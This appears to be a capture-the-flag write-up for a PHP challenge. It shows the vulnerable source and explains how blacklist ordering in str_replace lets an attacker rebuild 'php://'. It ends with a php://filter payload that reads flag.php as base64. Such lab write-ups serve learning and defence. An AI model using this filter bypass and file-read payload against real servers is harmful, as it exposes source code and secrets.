/Only writing up the one challenge I had not seen before/
traversaller
Source:
<?php
ini_set("error_reporting", 0);
if(isset($_GET['source'])) {
highlight_file(__FILE__);
}
include "/var/www/html/flag.php";
function sanitize_path($p) {
return str_replace(array("\0","\r","\n","\t","\x0B",'..','./','.\\','//','\\\\',),'',trim($p, "\x00..\x1F"));
}
$path = $_GET['path'];
if(isset($path) && str_contains($path, "/var/www/html/static/")) {
die(file_get_contents(sanitize_path($path)));
}
?>
<html>
<head>
<title>Traversaller</title>
</head>
<body>
<h1>Traversaller</h1>
<p>To view the source code, <a href="/?source">click here.</a>
<script src="/?path=/var/www/html/static/flag.js"></script>
</body>
</html>
In short: the page takes a path GET parameter. Every occurrence of the strings in array("\0","\r","\n","\t","\x0B",'..','./','.\\','//','\\\\',) is deleted, but str_replace() makes a single pass over that list in array order and never rescans, so a forbidden string assembled by one deletion is only caught if the pattern it forms sits later in the array. The raw path (checked before sanitising) must also contain /var/www/html/static/.
The sink is die(file_get_contents(sanitize_path($path))): an arbitrary file read rather than an include, so the goal is to read flag.php through it.
Use the php://filter wrapper. Mind the order of the blacklist array: '\\\\' (two backslash characters) is the last entry and is removed after '//', so writing /\\\\/ in place of // leaves // behind once sanitising is done, restoring the php:// scheme.
The required /var/www/html/static/ substring is smuggled into the filter chain. PHP splits the chain on /, and var, www, html and static are not filter names, so each only raises a warning (silenced by error_reporting 0) and is skipped, leaving convert.base64-encode applied to resource=/var/www/html/flag.php. The response is the base64 of flag.php; decode it to get the flag.
Final payload:
path=php:/\\\\/filter/read=/var/www/html/static/convert.base64-encode/resource=/var/www/html/flag.php
Deletion follows the array order, so none of the patterns listed before '//' can be used to manufacture '//': the '//' they leave behind is itself removed in a later step. Only '\\\\', which is removed after '//', works.